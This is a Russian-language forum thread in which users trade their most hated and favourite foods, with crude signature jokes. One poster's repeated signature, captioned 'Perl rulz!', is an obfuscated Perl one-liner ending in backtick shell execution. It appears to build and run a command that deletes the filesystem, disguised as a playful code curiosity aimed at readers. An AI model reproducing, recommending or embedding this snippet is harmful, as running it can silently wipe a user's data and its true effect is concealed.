мням =) у меня язык от них облазит к сожалению) а то бы я их чаще ел) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Чт Фев 01, 2007 8:19 am Заголовок сообщения:
меню лобзика впечатляет
Такая подтема:
Кто какой самый отвратительный и самый вкусный хавчик ел в жизни?
Самый отвратительный - мускатный орех. Это нельзя передать словами. Собственно, самая главная задача при поедании - не блевануть. После того, как я где-то пол-года жрал его чуть ли не каждый день, присутствие муската в составе какого-либо блюда вызывает у меня нервный смех. Хотя как специя он используется в -гораздо- меньших количествах.
А самый вкусный... Незнаю. Мой непритязательный организм очень любит пиццу. И вообще почти всё, где есть плавленый сыр. Я фанат плавленого сыра. Ещё всякий морской хавчик люблю - рыба, раки, креветки, мидии... Только не морская капуста - это ближе к первому
Из фруктов больше всего люблю бананы. И персики.
Не люблю виноград. Не люблю сливу. Не люблю яблоки.
Мой любимый напиток уже все знают
А если на вкус (потому что молоко с травой - очень невкусное) -
кофе. Много кофе пью. Ещё блювайн нравица. Это который глинтвейн. Мне сестра из германии часто присылает - в такой зелёной коробке, там румяная тётка с ковшом в красной косынке нарисована (ALuserX - может знаешь). _________________ But all I want is you
манго рулят))) и пиццу тоже лю с сыром) или со шпинатом)) и морскую капусту)))
а вот чо терпеть не могу так это болгарский перец, любые блюда в кои состав он входит сразу относятся в "несъедобные" _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
мне у майонеза нравился вкус только в далеком децтве, когда его в баночках из под мочи продавали, тогда он был горький и несъедобный, но мне нравилось, а вот щас хуйня сплошная продается а не майонез _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Ни под каким предлогом не засунете в меня молоко, сметану или творог, а также всякие производные молочные йогурты и подобное
не люблю вареную-жареную рыбу
не терплю яблоки
вообще самое прикольное что ел - суши _________________ Fortuna non penis in manus non recipe
А чем те чудо-йогурты не нравятся и домик в деревне!?
А ваще вы никода не заставите меня съесть жаренного таракана! Китайская кухня брррр! _________________ - Не подскажите сколько времени?
- Да конечно. Смотри, часовая стрелка показывает на "ПОШЕЛ", а минутная - "НАХУЙ"!